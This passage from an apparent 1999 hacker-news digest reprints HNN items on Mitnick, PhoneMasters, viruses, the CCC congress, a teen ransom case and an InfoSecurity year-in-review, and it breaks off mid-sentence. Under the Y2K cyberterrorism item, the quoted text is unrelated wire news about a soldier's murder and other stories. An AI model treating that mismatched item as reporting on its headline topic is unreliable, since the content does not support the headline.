Ahhhh, but the fun did not stop there. At Noon EST the HNN pranksters felt the unsuspecting public needed even more mayhem and hi jinx. The defaced page came down and the day's news went up. The news contained stories such as Kevin Mitnick breaking out of jail by whistling a 300 baud carrier into a phone, L0pht Heavy Industries selling L0phtCrack for $1.2 billion to NAI, CERT going out of Business, and Microsoft buying Network Solutions for complete control of the Internet. Considering the volume of mail we received regarding these stories (some of which came from mainstream journalists) many many people believed them.

Archive of HNN Defacement
http://www.hackernews.com/defaced/1999/HNN/crack.html
HNN Archive for April 1, 1999
http://www.hackernews.com/arch.html?040199

(WE didn't fall for this though!, hehe - Ed)

PhoneMasters

For some reason the mainstream media has really not paid attention to this story. Considering the level to which these crimes escalated and the methods and effort needed to catch these crooks it is a wonder that there wasn't more media coverage.

The FBI called them the 'Phone Masters' and labeled their crimes as one of the greatest cyber-intrusions of all time. Court records show that the Phone Masters had gained access to telephone networks of companies including AT&T Corp., British Telecommunications Inc., GTE Corp., MCI WorldCom (then MCI Communications Corp.), Southwestern Bell, and Sprint Corp. They broke into credit-reporting databases belonging to Equifax Inc. and TRW Inc. They entered Nexis/Lexis databases and systems of Dun & Bradstreet.
They could eavesdrop on phone calls, compromise secure databases, redirect communications, they also had access to portions of the national power grid, and air-traffic-control systems.

The FBI had to invent special equipment they called a 'data tap' specifically for this case and get special permission from DOJ to use it. It took several years of listening to phone calls to gather enough evidence for an arrest but on February 22, 1995 the FBI conducted a raid on three suspected members of the PhoneMasters. Other members of the group are thought to remain at large.

Three members of the group pleaded guilty to federal charges of one count of theft and possession of unauthorized calling-card numbers and one count of unauthorized access to computer systems. The three were sentenced in October for 24 to 41 months in federal prison.

What bothers us most about this story is that almost no mainstream media has reported on the story. The first mention we can find about the Phone Masters is from a local TV station, WFAA in Dallas FortWorth back in the beginning of May.

Phone Master Hacks - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/1999/phonemasters.html
HNN Archive October 4, 1999 - PhoneMasters Plead Guilty
http://www.hackernews.com/arch.html?100499
Wall Street Journal - one of the few articles about this case
http://www.zdnet.com/filters/printerfriendly/0,6061,2345639-2,00.html
Union Tribune - Another rare article that has a little bit more info.
http://www.uniontrib.com/news/uniontrib/sun/news/news_1n5hacker.html
CNN - Tries to answer why the media missed the boat
http://www.cnn.com/1999/TECH/computing/12/14/phone.hacking/index.html
Aviary Mag - Interview with An Acquaintance of the Phone Masters
http://www.aviary-mag.com/Martin/The_Phonemasters_And_I/the_phonemasters_and_i.html

MTV

Serena Achtul host of MTV News and of a documentary style program known as 'True Life' wanted to do a show on 'hacking' and in particular a show about Kevin Mitnick.
She was placed into contact with Emmanuel Goldstein of 2600 Magazine who organized several interviews for her. He spent a lot of time and effort in getting good people for her to talk to and they shot several hours worth of film.

For one reason or another the Kevin Mitnick aspect of the show was cut out, so being a good sport Emmanuel directed Serena to the folks at L0pht Heavy Industries. The L0pht crew made time in their busy schedules to spend an entire day with Serena and her film crew explaining the finer points of what they do and explaining the difference between script kiddie defacements and true hacking.

Again for some reason, this angle for the show was not to MTV's liking so they struck out on their own looking for whatever it was they wanted. They found Shamrock, the host of the Internet TV show devoted to hacking known as Pseudo.

The result was a complete farce. Evidently Shamrock decided to take MTV for a ride and give them what they wanted, a story line straight out of the movie Hackers. The show did nothing to explain what hacking was all about and was far from a documentary. Needless to say many people are upset at MTV and others over this mess.

Letters from HNN Viewers
http://www.hackernews.com/special/1999/mtv/mtv.html
Letter from Emmanuel Goldstein
http://www.hackernews.com/special/1999/mtv/emmanuel.html
Letter from Shamrock
http://www.hackernews.com/special/1999/mtv/shamrock.html

HNN: The Year in Review Page 3

Defcon VII and BO2K

Defcon probably had the most mainstream media coverage of any hacker convention to date. With over 3000 attendees and over 200 press representatives present it was definitely one of the biggest conventions ever. With the release of Back Orifice 2000 from the Cult of Dead Cow the press was working at a fever pitch trying to cover the story even before the software was released.

HNN spent quite a few days inebriated in Las Vegas while we tried to cover the happenings at Defcon.
Some of the highlights included the BO2K launch presentation, complete with thumping techno and strobe lights, the ejection of Carolyn Meinel from the conference floor, and the defacement of the Defcon.org web page. When we returned we had over 1200 emails to answer and one pounding hangover.

The media went nuts over the BO2K release, sparking debates on just what a virus is and what should be scanned. Network Associates claimed to be the first out of the gate with a patch for the program. Microsoft was even prompted to release a security bulletin.

Also at Defcon, Zero Knowledge released 1000 beta copies of Freedom, L0pht Heavy Industries introduced the revolutionary new security tool AntiSniff, Bruce Schneier announced that PPTPv2 'sucks less', and Security Wizards released their Capture the Flag Logs.

HNN Archive for July 9, 1999 - Press frenzy prior to con
http://www.hackernews.com/arch.html?070999

Defcon.org Defacement Mirror
http://www.hackernews.com/defaced/1999/defcon/index.html

HNN Archive for July 13, 1999 - the Aftermath
http://www.hackernews.com/arch.html?071399

Defcon VII Review - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/defconVII.html

The Back Orifice 2000 Controversy - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/bo2k-1.html

How the Anti Virus Industry Works - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/avindustry.html

AntiVirus scanning for potentially misused tools is a doomed security strategy. - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/avscanning.html

Kevin Mitnick

Kevin Mitnick's road has been a long and bumpy one that has stretched for several years; 1999 was no different. One small bright thing is that Kevin is scheduled to be released, finally, sometime early in 2000.

In March the federal government succeeded in wearing Kevin down. He decided to plead guilty in the hopes of getting his four year ordeal over with.
Unfortunately he still had charges from the State of California to deal with.

HNN Archive for March 29, 1999
http://www.hackernews.com/arch.html?032999#2

On April 26th it was revealed that the companies supposedly hurt by theft of software by Kevin Mitnick never reported those millions of dollars in losses to the SEC as required by law.

HNN Archive for April 25, 1999
http://www.hackernews.com/arch.html?042599

Letters from companies estimating the amount of damages.
http://www.hackernews.com/special/1999/letters.html

June 4th was supposed to be the day on which Kevin was officially sentenced and so demonstrations to support Kevin were planned at federal courthouses across the country. Unfortunately the hearing was postponed at the last minute but the demonstrations continued. Folks in other countries joined in by protesting outside embassies; the New York demonstration hired a skywriter to write FREE KEVIN over Central Park; the Philadelphia demonstration made it onto the local news and many online news agencies covered the San Francisco demonstration; numerous other cities attempted to live webcast their demonstrations.

HNN Archive for June 5, 1999
http://www.hackernews.com/arch.html?060599

Press Release - Demonstration Announcement
http://www.hackernews.com/press/mitnickpr.html

Picture of the Russian Demonstration
http://www.hackernews.com/images/kewl4.html

On Kevin's fifth birthday behind bars the LA District Attorney graciously decided to drop the state charges against him. The DA claimed that the case had been mischarged.

Finally on August 9th, after numerous delays, Kevin received his sentence of 46 months in prison with credit for time served. He will also be forced to pay $4125 restitution to the supposed victims in the case. Instead of a halfway house as expected he was remanded to Lompoc Federal Prison.
HNN Archive for August 9, 1999
http://www.hackernews.com/arch.html?080999

Much more in-depth information regarding Kevin Mitnick, his current status and the historical significance of this case can be found here.

FREE KEVIN
http://www.freekevin.com

Virus Scares

1999 was a banner year for viruses. Melissa, CIH, and numerous other viruses had the press working overtime. The virus writers keep churning them out, the antivirus companies keep detecting them and the press was not far behind.

Melissa seemed to be extremely virulent. By emailing 50 copies of itself after every infection it made it around the globe very quickly. It managed to jump the air-gap onto the US government's SIPRNet and even made it on board ships in the Seventh Fleet. Numerous variants of Melissa surfaced with distributed DoS attack capability. Melissa was somehow traced through Usenet to AOL and finally to David L. Smith who pleaded guilty to creating and releasing the virus.

HNN Archive for March 31, 1999 - Melissa makes it to 7th Fleet, Kills Marines Email, DoS Variant Appears
http://www.hackernews.com/arch.html?033199#2

HNN Archive for April 2, 1999 - David Smith arrested and released on $100,000 bail
http://www.hackernews.com/arch.html?040299

HNN Archive for April 5, 1999 - Melissa jumps air-gap onto classified SIPRNet
http://www.hackernews.com/arch.html?040599

HNN Archive for December 12, 1999 - David Smith pleads guilty.
http://www.hackernews.com/arch.html?121299

CIH, while not as prolific as Melissa, was definitely more destructive. CIH or Chernobyl is triggered to release its payload on April 26th every year and it has been around for a while. It hit exceedingly hard this year, especially in the Far East. Its creator was traced back to Taiwan where he said he was sorry.

HNN Archive for April 27, 1999 - CIH strikes worldwide
http://www.hackernews.com/arch.html?042799

HNN Archive for April 29, 1999 - CIH Author Identified.
http://www.hackernews.com/arch.html?042999

HNN Archive for May 12, 1999 - China Estimates 360,000 systems Damaged by CIH
http://www.hackernews.com/arch.html?051299#3

The Virus Community Speaks
http://www.hackernews.com/special/1999/virus.html

How the Anti Virus Industry Works - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/avindustry.html

AntiVirus scanning for potentially misused tools is a doomed security strategy. - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/avscanning.html

Ireland, Indonesia, China, Sweden, and Yugoslavia

Government sanctioned cyber attacks seem to be all the rage these days. Some countries are openly announcing their plans to create offensive cyber warriors while others are claiming to have already suffered government sanctioned cyber attacks.

In January a small ISP in Ireland, Connect Ireland, that hosts the top level domain for East Timor claimed that it had suffered a massive attack by Indonesian government forces. Indonesia of course denied the charges.

HNN Archive for January 26, 1999
http://www.hackernews.com/arch.html?012699

Newsweek claimed that President Clinton authorized a "top-secret" plan against Slobodan Milosevic. One part of this plan would use "computer hackers" to attack his foreign bank accounts. Newsweek went on to say that the report instructed the CIA to wage "cyberwar" against Milosevic.

HNN Archive for May 24, 1999
http://www.hackernews.com/arch.html?052499

HNN Archive for July 6, 1999
http://www.hackernews.com/arch.html?070699

Yugoslavia Cut Off from the Net? - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/yugo.html

Sweden announced the formation of a cyber defense force.
HNN Archive for July 14, 1999
http://www.hackernews.com/arch.html?071499#3

Nobel Peace Prize laureate Jose Ramos-Horta claimed that hundreds of people around the world were poised to launch a cyber attack against Indonesia should there be any tampering in the election process for East Timor's freedom. No evidence was given for this cyber arsenal build up and no attack ever came. Connect Ireland, the ISP supposedly targeted by Indonesian forces earlier in the year, asked that no internet attacks be launched.

HNN Archive for August 20, 1999
http://www.hackernews.com/arch.html?082099

Connect Ireland - response to Indonesian threats
http://www.hackernews.com/press/conire.html

A Chinese military newspaper covering the activities of China's People's Liberation Army has called for the recruitment of 'civilian hackers' and for the training of 'cyber warriors' at Army schools.

HNN Archive for August 4, 1999
http://www.hackernews.com/arch.html?080499#4

We hope that this disturbing trend does not continue into the next year. It will be an extremely bad day when the internet is legislated as a weapon of war.

@HWA

11.0 16th CCC Congress opens Monday in Berlin 12/26/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Frank

Although the Y2K issue will keep many people from attending this year, the 16th annual Chaos Computer Congress is expecting over 2000 people to show up. New to this year's conference will be Lego Mindstorms Sumo where competitors attempt to push each other's creations off a table.

Chaos Communication Congress
http://www.ccc.de/congress/

HNN Cons Page
http://www.hackernews.com/cons/cons.html

Wired
http://www.wired.com/news/culture/0,1284,33263,00.html

Chaos Reigns in Berlin
by Steve Kettmann
3:00 a.m. 24.Dec.1999 PST

BERLIN -- Any time the inimitable Berlin hackers of the Chaos Computer Club convene, count on cutting-edge insights to emerge from the proceedings.
That should be true at the 16th annual CCC congress opening Monday in Berlin, even though the vitality of the three-day event could be short-circuited by the surge of Y2K angst.

After all, just the sort of gifted, seasoned hackers and computer visionaries the CCC attracts will in many cases be chained to their desks, stuck on the Y2K watch.

"A lot of people are not allowed to go anywhere in these days," CCC spokesman Andy Mueller-Maguhn said. "They all have to stay at their companies until the end of January to see if there are any problems with Y2K. So this is a more chaotic congress than ever."

Still, the show promises not to be dull. More than 2,000 people from around the world are expected to talk hacking, do actual hacking, and just generally wallow in the face-to-face contact computer-obsessed people sometimes miss.

The annual congresses have featured such lively fare as a spirited debate last year on the controversial death of famous German hacker Boris Floricic, known as Tron (many of his friends still think his apparent suicide in October 1998 was faked by police). Tron's computer and all his files were confiscated, and a discussion this year will be dedicated to him.

Last summer, the CCC organized a sprawling hacker camp outside of Berlin. One of the highlights then was Electronic Frontier Foundation board member John Gilmore leading discussions on topics such as encryption code and the ins and outs of Linux -- all the while taking breaks for space waffles and other diversions.

Lock-picking, a sort of mechanical-world spinoff of hacking, was also a huge hit at that camp, and it's expected to pick up next week.

Also popular at the summer camp was the Art & Beauty Raum: "For people interested in creating and designing and using computers to build your own world."
Other projects will be Create a Part of c-base Contest, Computer Generated Comics, Poetech Slam, and, maybe the most provocatively titled of all, Lego Mindstorms Sumo.

"Groups of people will build their stuff in three days and fight with each other and try to throw each other from the table," Mueller-Maguhn said.

The CCC has been known internationally for years, and it played a major role this year in helping Andrew Fernandes tell the world about his belief that the National Security Agency might have worked with Microsoft to make it easier for the government agency to bypass security systems in the major Windows operating systems.

Fernandes, chief scientist for the security software company Cryptonym in Mississauga, Ontario, chose the CCC to help make his announcement because tapping them is the way to tap the worldwide hacker scene, he said at the time.

@HWA

12.0 Canadian Youth Held for Cyber Ransom 12/26/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

A 14-year-old Toronto youngster has been charged with electronically breaking into an unidentified e-commerce company. The youth allegedly broke into the company's site and changed passwords to prevent the owner from accessing his mail. He then demanded $5,000 from the owner to return control and was arrested when he came to collect his cash.

CNews
http://www.canoe.ca/TechNews9912/23_hacker.html

Thursday, December 23, 1999

Hacker, 14, in jail over ransom scheme
By IAN HARVEY, TORONTO SUN

A 14-year-old hacker who held a Toronto e-commerce company for ransom will spend Christmas in jail.

He was held over in custody to Jan. 4 at his bail hearing yesterday on request of his lawyer.

Meanwhile, Toronto police are scanning his hard drive, seized from his computer, to see just what else the juvenile hacker has been up to.

"We have no idea how far this goes or if this is the only company that has been victimized," said Det.
Myron Demkiw of the west-end 14 division.

He was guarded about the youth's technique and background because the accused is a young offender.

However, Jim Carroll, co-author of the Canadian Internet Handbook, says the youth probably isn't a computer genius.

"Most of the time hackers can do what they do because of negligence on the part of the network administrators," he said.

The York region youth was charged with hacking into the company's site and changing passwords to prevent the owner from accessing his mail. He then demanded $5,000 from the owner to return control and was arrested when he came to collect his cash.

The network hacker is one of three types, which also include the virus builder and software cracker (someone who "cracks" the anti-piracy protection on software to allow it to be copied and bootlegged).

While the youth certainly has some knowledge of the Internet and computer language, he's probably not the stereotypical hacker, said McMaster University professor David Jones of the Electronic Frontier Canada.

He said there's a whole community of like-minded computer fans who share information on weaknesses in security systems and passwords online.

"It's like kids playing Nintendo 64; it's a whole different world," he said. "They know all the cheat codes to get to other levels and characters. How? They just know."

Both Jones and Carroll said any system that allowed a 14-year-old to breach security was "pretty crappy."

"For the kids who do it, it's like a game; they gain face by getting into system," Jones said.

@HWA

13.0 Poulsen's List of Gifts to Get a Hacker 12/26/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ya, it's a little late, maybe next year? heh - Ed

From HNN http://www.hackernews.com/

contributed by Evil Wench

Kevin Poulsen has published a Christmas shopping list for the hacker. Kevin could have shown some more creativity, not to mention a longer list.
While the items he has chosen are ok, my wish list is quite a bit longer and a lot more expensive. Everyone knows Hackers want LOTS of goodies for the holidays. (LEDs = Power. Whoever has the most when they die, wins.)

ZD Net
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2412532,00.html

A Hacker Christmas

Last-minute gift purchases for the hacker in the house.

By Kevin Poulsen
December 22, 1999

With each passing holiday season, it seems I'm asked more and more frequently, "Kevin, what do I get a hacker for the holidays?" Here are a few answers.

The Happy Hacker keyboard from PFU America dispenses with such frivolities as a caps-lock key, numeric keypad, or function keys, and finally puts the control key back where it belongs -- next to the left pinky finger. Don't even ask where the Windows key is. The design is openly hostile to everything Microsoft, making it particularly popular with the Linux set.

The keyboard is meant for coding, though its super-compact 11.6 x 4.3 inch footprint makes it attractive to anyone tired of stretching to reach the mouse. Regrettably, it comes only in white, but optional carrying cases in burgundy, navy, and black make it a fashionable tote for contemporary cyberpunks.

Too Hip?

Looking for stocking stuffers? I recommend The Matrix on DVD. The film itself is a hacker-culture masterpiece. More importantly, the DVD format recently earned a certain cachet when hackers took the trouble to reverse engineer the copy protection scheme so they could watch movies on their Linux boxes.

The Matrix title has the added coolness that comes with being so advanced that it doesn't work on some older models of consumer DVD players. It's not a bug, it's a feature!

For the Kid in All of Us

Toys of any kind are a popular Christmas treat, and there are certain kinds of playthings that have a fundamental appeal to hackers of all ages.
A passion for LEGO's interlocking building blocks, popular in the 1960s, has been a dirty little secret shared by many hackers for generations. It got a shot in the arm recently, when LEGO created Mindstorms, a fully motorized, programmable robotic block system, with infrared communications and embedded light sensors, among other features.

Mindstorms was meant for kids: it comes with friendly software that lets little tykes program their robotic creations with point-and-click ease. Hackers, however, are doing, well, what hackers do: writing an open source operating system for the brainy blocks which includes dynamic module loading and a memory management system. The legOS programmers (no, I'm not making this up) recently fixed a bug in their inter-block packet switching code, just in time for Christmas.

Gifting in Style

Finally, this holiday season, say it with wearable computing. Xybernaut offers a lightweight, 233-MHZ system that clips to any utility belt or an optional vest. A headset serves as a user interface, allowing the lucky recipient of your Yuletide generosity to issue voice commands through a microphone while viewing output on a one-inch diagonal monitor that hangs in front of the wearer's left eye. Add a wireless modem, and the hacker in your life need never log off the Net.

@HWA

14.0 More FUD About Cyberterrorists and Y2K 12/26/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Gh0st47

As we get closer and closer to that magical day, January 1st, the media will continue to increase the FUD factor regarding Y2K. Since the initial problem of computer meltdown seems to be fading away, the issue of viruses and terrorist attacks is getting more attention. While the threats are definitely real it is doubtful they are as fantastic as most would have us believe.
Access Atlanta http://www.accessatlanta.com/partners/ajc/epaper/editions/today/news_23.html NATION IN BRIEF Monday • January 10 Slain soldier's parents ponder suing Army The parents of slain Pfc. Barry Winchell are considering suing the Army for failing to protect their son from anti-gay harassment. In an interview Sunday, Pat and Wally Kutteles said military officials at Fort Campbell, Ky., did not take sufficient precautions to prevent Winchell's July 5 beating. Winchell, who was rumored to be gay, was attacked by another soldier as he was sleeping. Pat Kutteles said commanders at the 101st Airborne Division tolerated a four-month harassment campaign against her son in clear violation of the Pentagon's ''don't ask, don't tell'' policy toward gays, a standard that has come under mounting criticism in recent weeks. The Kansas City, Mo. couple's comments came a day after Army Spc. Justin R. Fisher, 26, pleaded guilty to obstructing justice and lying to military investigators in connection with Winchell's death. Fisher, who was sentenced to 12 1/2 years in prison, wiped blood off the bat that Pvt. Calvin N. Glover used to kill Winchell. Prosecutors had said Fisher, who was Winchell's barracks mate, encouraged Glover to attack Winchell. Glover, 18, was convicted last month of premeditated murder and sentenced to life in prison with the possibility of parole. FBI watched mayor for 40 years, paper says The late Detroit Mayor Coleman Young was under FBI surveillance for roughly four decades, The Detroit News reported Sunday. Records obtained under the federal Freedom of Information Act show the surveillance began in the 1940s when agents who suspected the well-known labor activist had Communist ties followed him to union meetings, the newspaper said. Young was mayor for 20 years, retiring in 1994. He died in 1997. 
Elderly avoid crime by staying at home

Violent criminals attack Americans age 65 or older far less often than younger men and women, probably because older people do not go out at night as much, the Justice Department reported Sunday. There were an average of 5.3 violent crimes for every 1,000 U.S. residents age 65 or older each year from 1992 through 1997, the department's Bureau of Justice Statistics said. About 22 percent of elderly violence victims reported they never went out at night for entertainment, shopping or other activities.

Controversial exhibit ends run in New York

Art lovers and the morbidly curious flocked to New York City's Brooklyn Museum in large numbers on Sunday for a last look at the controversial ''Sensation'' art exhibit with its dung-decorated Madonna. As the crowd swelled on the final day of the exhibit's three-month run, about two dozen demonstrators stood outside, singing hymns and reciting ''Hail Mary,'' a Catholic prayer, in protest of what they claim is a blasphemous painting of the Virgin Mary. Chris Ofili's painting, ''The Holy Virgin Mary,'' features the Virgin Mary decorated with elephant dung.

@HWA

15.0 The Datacore Encryption Suite 1.0 Released on Christmas 12/26/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by The Hex

The Datacore releases The Datacore Encryption Suite 1.0 on December 25. DES1.0 consists of an easy to use interface, and uses many well known algorithms. They hope you enjoy the program.

The Datacore
http://www.tdcore.com/newbuild/fractal/preview.html (197k download)

@HWA

16.0 One Third of UK Vulnerable to Online Attack 12/27/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

A survey of 150 UK-based IT managers and directors who use the Internet as a business tool found that one third of them did not have adequate measures in place to prevent a cyber attack.
The study, conducted by Novell, found that 37% of UK companies on the net have no firewall and 44% do not make use of authentication.

Info-Sec.com
http://www.info-sec.com/internet/99/internet_122799b_j.shtml

@HWA

17.0 Grades Changed at NY School 12/27/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by pyrodude2001

According to school officials at Spencerport High School a student may have accessed the grading system of the school's computer and changed a few of them. Officials are unsure of how the intrusion occurred or if in fact any grades were changed. As a precaution teachers will manually verify the grades in the computer with their records.

Rochester News
http://www.rochesternews.com/1225grades.html
(Sorry, link gave us a 404 - Ed)

@HWA

18.0 Cops Wanted, Hackers Need Not Apply 12/27/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

What do Deloitte & Touche, Ernst & Young and PricewaterhouseCoopers all seem to have in common? According to this article it is that all of them are looking for ex-law enforcement personnel to work in their computer forensic divisions. No, they don't want people who have been dealing with computer security since they were three, they want someone with a background in dealing with rapists and hit men.

NY Times - Yes registration is required. Just use a fake address.
http://www.nytimes.com/library/financial/personal/122699personal-cybercrime.html

December 26, 1999

CALLINGS

The Hunt for Cybercrime

By LAURA PEDERSEN-PIETERSEN

Tracking down embezzlers, computer hackers, money launderers, shady stock promoters and other white-collar criminals may lack the pizazz of James Bond outwitting Goldfinger or decapitating Oddjob.
But in a post-cold-war global economy, don't be surprised if some of the first movie heroes of the new millennium are bespectacled, Palm VII-packing auditors from Big Five accounting firms, Web browsers at the ready. "The breadth of criminal activities facilitated by global computer networks, such as lifting personal credit card information, redirecting electronic funds and stealing proprietary and other confidential information, continues to grow," said Stephen O. Pierce, a partner at PricewaterhouseCoopers who heads its investigations unit. And crimes could hit close to home. One of the firm's clients, the Pension Benefit Guaranty Corporation, a federal agency that sends checks to some 500,000 retirees, recently found its computer defenses penetrated by security experts who could have robbed it blind. The reason they didn't was that the break-in was a test of the agency's systems, determining that for all the electronic safeguards, it was vulnerable to external and internal attack. With businesses rushing to go online, theft and fraud are not far behind. E-commerce has spawned its own array of hard-to-detect cybercrimes, like transaction fraud and Web site destruction. The crimes are producing not only fear in corporations, but also many new assignments for auditors and consultants, who are increasingly being asked to trace e-mail and ferret out smoldering diskettes. But in trying to find gumshoes who can sniff out white-collar crime from three cubicles away, Big Five recruiters obviously won't find many candidates on the B-school campus. That is why, over the last 18 months, almost all of the 25 new employees hired for the Deloitte & Touche forensic and investigative services division came with law-enforcement experience. And PricewaterhouseCoopers, in addition to hiring former F.B.I. and Interpol agents, has just recruited Scott Charney, 43, formerly a top cybercop at the Justice Department. 
At Ernst & Young, the forensic investigations practice has more than tripled in two years, said Cheryl Sparkes, a partner. "We've gone from 30 to 100 employees and we're aggressively seeking more," she said, "mostly with law enforcement and other investigative backgrounds."

CONSIDER Don M. Svendson, 50, hired last year after a 26-year career with the Royal Canadian Mounted Police to run Deloitte & Touche's investigative office in Chicago. "There's no end in sight to the rise in embezzlement, executive malfeasance and money laundering," he said.

Though a roaring economy and the dot-com invasion make pastures greener for criminal activity, Mr. Svendson says there is more to it than that. "Corporations are leaner and meaner, the management turnover is high and companies can't exercise all the controls they really need," he said.

Mr. Svendson may well be a typical recruit -- someone with professional training in criminal justice and decades of hands-on experience. While the job may not sound as adrenaline-pumping as his previous work -- which included commanding a SWAT team in Manitoba and breaking up riots -- he says he finds it thrilling.

Having extracted confessions from rapists and hit men, Mr. Svendson was recently asked to put his interrogation skills to work on someone suspected of embezzlement at a company after irregularities were found. Mr. Svendson said he got the employee to confess; the employee was dismissed.

"You need to know what body language to look for and how to ask the questions," Mr. Svendson said.

Ed Rial, 40, recently made the leap from criminal justice to corporate fraud investigation, and is now a Deloitte partner. Mr. Rial, who dreamed as a boy of being a detective, graduated from the University of Pennsylvania law school in 1984 and took a job at the Justice Department in Manhattan.
He spent almost a decade as a federal prosecutor and four years in charge of a New York office of the department's business and securities fraud unit, bringing to trial cases involving drugs, murder and kidnapping.

With Deloitte since November, Mr. Rial specializes in hunting down corporate fraud, kickback schemes and insurance fraud. These days, he sees stock fraud as the fastest-growing white-collar crime. In particular, he cites outfits that take shell companies public, trade with cronies, then dump the shares into the public's lap through cold calls.

"Many of these boiler-room brokers worked for years as telemarketers," Mr. Rial said. "They have phenomenal sales skills and are completely unscrupulous. And it's incredible the amount of participation they get from smart people -- doctors, lawyers and educators."

The quick stock-market success of Internet companies, he added, makes people more susceptible to high-technology pitches from fraudulent promoters.

And many people don't think of white-collar crime as a big issue anyhow. "It's because the perpetrators are often the people you grew up with, the best friend of your father," Mr. Rial said. "They're almost always people in very senior positions. Believe me, no one ever says, 'I always suspected him.' "

@HWA

19.0 IDS Signature Database Open to the Public 12/27/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by vision

arachNIDS (Advanced Reference Archive of Current Heuristics for Network Intrusion Detection Systems) is now open to the public. The database is an attempt to profile probes, exploits, and other network-borne attacks by way of packet details, example sniffer traces of the attack, and a signature that can be exported for use in free IDS products such as Snort. This preliminary release will be greatly expanded upon as time goes by.
Whitehats.com
http://whitehats.com/

@HWA

20.0 InfoSecurity 1999 Year in Review 12/27/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

InfoSecurity Magazine has published its 1999 Year in Review. Their list contrasts greatly with the top stories of 1999 as picked by HNN.

Info Security Magazine
http://www.infosecuritymag.com/dec99/1299Yr.inRev.htm

HNN's 1999 Year in Review
http://www.hackernews.com/special/1999/99topstories.html
(See elsewhere in this issue)

Info Security Mag:

1999 Infosecurity Year-in-Review

From Melissa to Explore.Zip, from Hotmail to TWINKLE, from BubbleBoy to BO2K, from InfraGard to Fidnet, the events of 1999 put information security in the public eye and on the corporate roadmap like never before. As we look back on the year that was, it’s clear just how important infosec has become to the stability and prosperity of commerce, communication and international peace.

BY M.E. KABAY

This article is excerpted from ICSA Labs’s Infosec Year-in-Review database, which classifies hundreds of cases and issues spanning the field of information security. The complete report will be available for download as a PDF file in early 2000. www.icsa.net

1999 was a remarkable year in the field of information systems security. Ten years from now, the last year of the second millennium will be remembered for a number of important events:

• In the fight against malicious code, 1999 was the year the AV experts’ direst predictions came true: e-mail-enabled viruses and worms are now a serious threat to systems everywhere. Because these new forms of malicious software can spread so fast through the ’Net, waiting for antivirus vendors to produce updates to signature tables is not enough to protect everyone. In 2000, the AV industry will need to develop better heuristic techniques to identify the abnormal behavior of such viruses/worms, stopping them even if they aren’t immediately identified by their signatures.
• In addition to losing its landmark antitrust case with the Justice Department, Microsoft was again the target of widespread criticism in 1999 for its "security" practices, including its absurd policy of turning every consumer product it makes into a programming language (or the equivalent of an operating system). The security community’s message to the Redmond software giant is now louder than ever: Stop this nonsense of allowing automatic execution of macros when opening Word and Excel files. And it would be helpful if Windows had provisions for enabling pop-up warnings that could be configured—preferably by default—to warn naive users about the risks of opening executables of unknown origin. Will Microsoft listen? Only time will tell. Meanwhile, the public release of Win2K is only eight weeks away. • The number of successful attacks on Web sites increased dramatically in 1999. More and more script kiddies are plastering graffiti on government, industry and educational Web sites as if they were engaged in a video game. Systems administrators continue to be deprived of adequate resources and management support to keep Internet-visible networks patched so that vulnerabilities are fixed before someone can exploit them. • In addition to the script kiddie wars, 1999 witnessed several cases of Web defacement that seemed to be a form of information warfare. Chinese and Taiwanese hackers attacked government sites on both sides of the water, and Serbian and Kosovar hackers did the same to each other’s governmental sites. • Privacy has developed as perhaps the single greatest concern of the ordinary Internet-using public in 1999. There have been many legislative initiatives to improve privacy in the United States and elsewhere; the new EU Data Privacy Directive has serious implications for all organizations intending to do business with Europe. • Ah, yes, and then there’s Y2K. 
I deliberately omitted mention of the Y2K problem in the following article, since most would argue it’s not really a "security" issue to begin with. Suffice it to say, the Y2K transition may be the best opportunity we’ll ever have to witness the equivalent of information warfare on our highly technological society. I hope there won’t be any trouble, but if there is, we should observe carefully and learn quickly from our mistakes. Now, here’s a review of some of the year’s other major events, broken out within nearly two-dozen categories. Breaches of Confidentiality 4.22.99 Joe Harris, a computer technician at the Seattle-area "Blarg! Online" ISP, discovered that improperly installed shopping-cart software, used widely on the ’Net to simplify shopping, can allow anyone to see confidential data, such as credit card numbers. Security analysts pointed out that the plain ASCII file where such data are stored should not be on the Web server at all—or if it is, the file should be encrypted. Initial evaluation suggested that the weakness affects at least several hundred, and possibly many thousands, of e-commerce sites where the software was improperly installed. Wiretapping, Interception (Not Jamming) 4.27.99 The Australian Security Intelligence Organization (ASIO) announced its intention to seek remote access to computer records of suspects under investigation. However, a spokesman for the ASIO said the organization had not yet broken into computers using existing technology, since that was not permitted under current law. Data Diddling, Data Corruption 3.01.99 We learned in March that two more Chinese criminal hackers were sentenced to death in China in December 1998. The twin brothers stole 720,000 Yuan (~US$87,000) from a bank in Zhenjiang and transferred the money to their own accounts. Viruses, Hoaxes, Trojans 3.27.99 On Friday, March 26, CERT/CC received initial reports of a fast-spreading new 